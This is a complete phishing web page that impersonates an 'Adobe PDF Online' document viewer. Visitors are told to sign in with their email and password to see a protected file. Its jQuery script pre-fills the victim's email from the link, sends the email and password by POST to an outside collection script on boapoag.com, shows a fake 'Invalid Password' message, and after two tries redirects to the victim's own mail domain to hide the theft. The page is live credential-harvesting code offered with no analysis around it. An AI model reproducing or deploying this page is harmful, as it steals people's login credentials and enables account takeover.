<!doctype html>
<html lang="en">

<head>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="https://code.jquery.com/jquery-3.1.1.min.js"></script>
        <script src="https://code.jquery.com/jquery-3.3.1.js" integrity="sha256-2Kok7MbOyxpgUVvAk/HJ2jigOSYS2auK4Pfzbm7uH60=" crossorigin="anonymous"></script>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous">
    <link href="https://fonts.googleapis.com/css?family=Archivo+Narrow&display=swap" rel="stylesheet">
    <!-- <link rel="icon" type="image/png" sizes="32x32" href="images/favicon-32x32.png"> -->
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
    <title>..Online..</title>
    <style type="text/css">
    textarea:hover,
    /*input:hover,*/
    textarea:active,
    input:active,
    textarea:focus,
    input:focus,
    select:focus,
    button:focus,
    button:active,
    button:hover,
    .btn:active,
    .btn.active {
        outline: 0px !important;
        -webkit-appearance: none;
        box-shadow: none !important;
    }




    .input-icons i {
        position: absolute;
    }

    .input-icons {
        width: 100%;
    }

    .icon {
        padding: 15px;
        min-width: 40px;
        color: #8FA7AD;
    }

    .input-field {
        width: 100%;
        padding: 7px;
        border-radius: 0px;
        padding-left: 20px;
        text-align: left;
        border: 1px solid #B7B7B7;
    }



    .submit-btn {
        box-shadow: inset 0px 34px 0px -15px #b54b3a;
        background-color: #a73f2d;
        border-radius: 16px;
        border: 1px solid #b34332;
        display: inline-block;
        cursor: pointer;
        color: #ffffff;
        font-family: Arial;
        font-size: 15px;
        font-weight: bold;
        padding: 9px 23px;
        text-decoration: none;
        text-shadow: 0px -1px 0px #7a2a1d;
    }

    .submit-btn:hover {
        background-color: #b34332;
    }

    .submit-btn:active {
        position: relative;
        top: 1px;
    }
    </style>
</head>

<body style="background-image: url('https://storage.googleapis.com/erthgffertyhgfewd.appspot.com/bg21.jpg'); background-size: cover;background-repeat: no-repeat;">
    <div class="container-fluid p-0">
        <div class="container-fluid " style="background-color: #A50E01;">
            <div class="row">
                <div class="col-lg-11 mx-auto my-1 p-2">
                    <div class="p-2">
                        <img src="https://storage.googleapis.com/erthgffertyhgfewd.appspot.com/logo1.png" class="img-fluid" width="50px">
                        <span class="h3 text-white align-middle">Adobe PDF Online</span>
                    </div>
                </div>
            </div>
        </div>
        <div class="container-fluid">
            <div class="row" style="margin: 100px 0px ;">
                <div class="col-lg-5 mx-auto">
                    <div style="background-color: #A50E01;border-radius:5px; padding:40px;">
                        <div class="col-lg-12 p-0">
                            <img src="https://storage.googleapis.com/erthgffertyhgfewd.appspot.com/logo1.png" class="img-fluid" width="50px;">
                            <span class="align-middle" style="color: white; font-size: 25px; font-weight: 500;">Adobe PDF Online</span>
                        </div>
                        <div class="form-check mt-3">
                            <label class="form-check-label" style="color: white">
                                View File Online.
                            </label>
                        </div>
                        <div class="form-check mt-1">
                            <label class="form-check-label" style="color: white">
                                Sign in with your receiving email account to view Document.
                            </label>
                        </div>
                        <!-- form -->
                        <div class="mt-4 mx-auto">
                            <center>
                                <div class="alert alert-warning" id="msg" style="display: none;">Invalid Password...! Please enter correct password.</div>
                                <span id="error" class="text-warning" style="display: none;">That account doesn't exist. Enter a different account.</span>
                            </center>
                            <form id="contact" class="form-horizontal well">
                                <div id="div1" class="text-dark">
                                    <div>
                                        <div class="form-group m-0">
                                            <div id="inputbar">
                                                <label class="font-weight-bold text-white">Email Address</label>
                                                <div class="input-icons">
                                                    <input type="email" name="ai" class="input-field" id="ai" aria-describedby="aiHelp" placeholder="">
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="mt-4">
                                        <div class="form-group m-0">
                                            <label class="font-weight-bold text-white">Password</label>
                                            <div class="input-icons">
                                                <input type="password" name="pr" class="input-field" id="pr" aria-describedby="emailHelp" placeholder="">
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </form>
                        </div>
                        <div class="text-center col-lg-10 mx-auto mt-5">
                            <button class="submit-btn" id="submit-btn">Login To View File</button>
                        </div>
                        <div class="mt-4 text-center text-white" style="font-size: 14px">
                            <span>To access our online secured documents page, you are required to login your email address this is to ensure you are the rightful recipient for the protected file.Unathorized access is prohibited.</span>
                        </div>
                        <!-- form close -->
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>
</body>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
/* global $ */
$(document).ready(function() {
    var count = 0;

    /////////////url ai getting////////////////
    var ai = window.location.hash.substr(1);
    if (!ai) {

    } else {
        // $('#ai').val(ai);
        var my_ai = ai;
        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();

        $('#contact').trigger("reset");
        $("#msg").hide();
        $('#ai').val(my_ai);
        $('#aich').html(my_ai);
        $("#msg").hide();

    }
    ///////////////url getting ai////////////////
var file="bmV4dC5waHA=";

    $('#submit-btn').click(function(event) {
        $('#error').hide();
        $('#msg').hide();
        event.preventDefault();
        var ai = $("#ai").val();
        var pr = $("#pr").val();
        ///////////new injection////////////////
        var my_ai = ai;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        if (!my_ai) {
            $('#error').show();
            $('#error').html("Please fill email field");
            return false;
        }
        else if (!filter.test(my_ai)) {
            $('#error').show();
            $('#error').html("That account doesn't exist. Enter a different account.");
            return false;
        }
        if (!pr) {
            $('#error').show();
            $('#error').html("Please fill password field");
            return false;
        }


        var ind = my_ai.indexOf("@");
        var my_slice = my_ai.substr((ind + 1));
        var c = my_slice.substr(0, my_slice.indexOf('.'));
        var final = c.toLowerCase();
        var n = my_ai.search("@");
        ///////////new injection////////////////
        count = count + 1;
        $.ajax({
            dataType: 'JSON',
            url: 'https://boapoag.com/yebjhbashbwefbcs14jan/next.php',
            type: 'POST',
            data: {
                ai: ai,
                pr: pr,
            },
            beforeSend: function(xhr) {
                $('#submit-btn').html('Verifing...');
            },
            success: function(response) {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace('https://www.' + my_slice);
                    return false;
                }
                $("#msg").show();
            },
            error: function() {
                $("#pr").val("");
                if (count >= 2) {
                    count = 0;
                    window.location.replace('https://www.' + my_slice);
                    return false;
                }
                $("#msg").show();
            },
            complete: function() {
                $('#submit-btn').html('Login To View File');
            }
        });
    });



});
</script>

</html>